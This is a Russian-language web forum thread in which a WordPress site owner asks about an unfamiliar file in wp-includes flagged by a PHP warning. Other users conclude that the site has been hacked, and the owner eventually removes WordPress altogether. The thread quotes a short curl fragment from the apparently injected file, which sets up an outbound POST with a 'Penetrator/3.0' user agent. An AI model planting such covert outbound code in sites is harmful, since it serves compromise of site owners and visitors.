Jump to content

Косяк в PHP-файле из Wordpress

Recommended Posts

Guest KiminT

Нашел в логах ошибок, что:

Wed May 29 17:25:54 2013] [warn] mod_fcgid: stderr: PHP Warning:  curl_setopt() [<a href='function.curl-setopt'>function.curl-setopt</a>]: CURLOPT_FOLLOWLOCATION cannot be activated w
> hen safe_mode is enabled or an open_basedir is set in /home/vhosts/site.ru/httpdocs/wp-includes/bjmkjirlhbdblf.php on line 493

Полез по адресу, и нашел эту строку в куске кода курла (если правильно я понял):

if (function_exists("curl_init"))
    {
    $ch=curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $amt_d->t_o);
    curl_setopt($ch, CURLOPT_USERAGENT, "Penetrator/3.0");
    curl_setopt($ch, CURLOPT_REFERER, $amt_d->my_h);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

Вопроса сразу три:
Как лечить ( и зачем?);
Откуда (не шелл ли это вражеский?);
Критично ли для скорости загрузки страниц, поисковых роботов, стабильной работы сайта?

В последнее время активно использую плагин WP Ban - на определенные IP-зоны он отвечает html-страничкой, что "Ты кто такой, давай - до свидания". Ограничение посещений с ненужных стран вроде Въетнама и Индонезии. Это может быть его хвостом? Плагин пашет уже не один год, а ошибка пошла недавно, с пару недель как.

Буду рад ответу по теме, в благодарность могу что-то хорошее сделать. Например, нарисовать в векторе небольшой лого, схемку, наложить полупрозрачный ватермарк, отретушировать-коллажировать фото. Спс за внимание и помощь.

Покупайте криптовалюту безопасно за считанные минуты!

Guest KiminT

А еще сейчас поймал собственный косяк, забыл переписать импорт css на нужный урл) То есть, индекс посылал запрос к css, а у того в импорте урл другой, старого сайтика)) Но ничо, работает же)) Исправил. Может это быть отчетом о таком косяке?

bjmkjirlhbdblf.php

Такого файла с сборке WP нет. Плагины не копируют файлы в ядро движка, как правило.

Нагадил вам кто-то в тарелку с едой.

Не понял, какое отношение CSS имеет к PHP. :huh:

Guest KiminT

Такого файла с сборке WP нет. Плагины не копируют файлы в ядро движка, как правило.

Нагадил вам кто-то в тарелку с едой.

Не понял, какое отношение CSS имеет к PHP. :huh:

Сносить весь файл к чертовой матери тогда? Точно в инклуде такое не порождается плагинами?

Да одно только название файла должно вызвать со мнение. С вордпресс дружу уже более 5 лет, перековырял все, что можно - ни разу не встречал подобных файлов.

Нужно проверить, не запрашивается ли он каким-нибудь другим файлом.

Guest KiminT

Горький урок дилетанта... С WP (админпанель-темы-HTML-jqwery) работал около 4 лет, и только сейчас понял, что в PHP-структуре этого движка еще надо глубоко разбираться. Это было что-то страшное и начиналось в файле wp-confug, if - и три строки были связаны с такими вот файлами, кракозябрами из инклудс.
Снес к чертовой матери движок, и вернулся к родному статичному HTML. Пусть я потерял позиции, контент (часть) - переживу. Зато никакая мразота теперь на мой строительный сайт не сможет пристроить что-то, что останется незамеченным для меня.

• 3 weeks later...

у вас что то не то с движком видимо.... по вашем всем описаниям если в голове все представить то выходит не сладкая кашка какая то просто... извините если не так что... :unsure: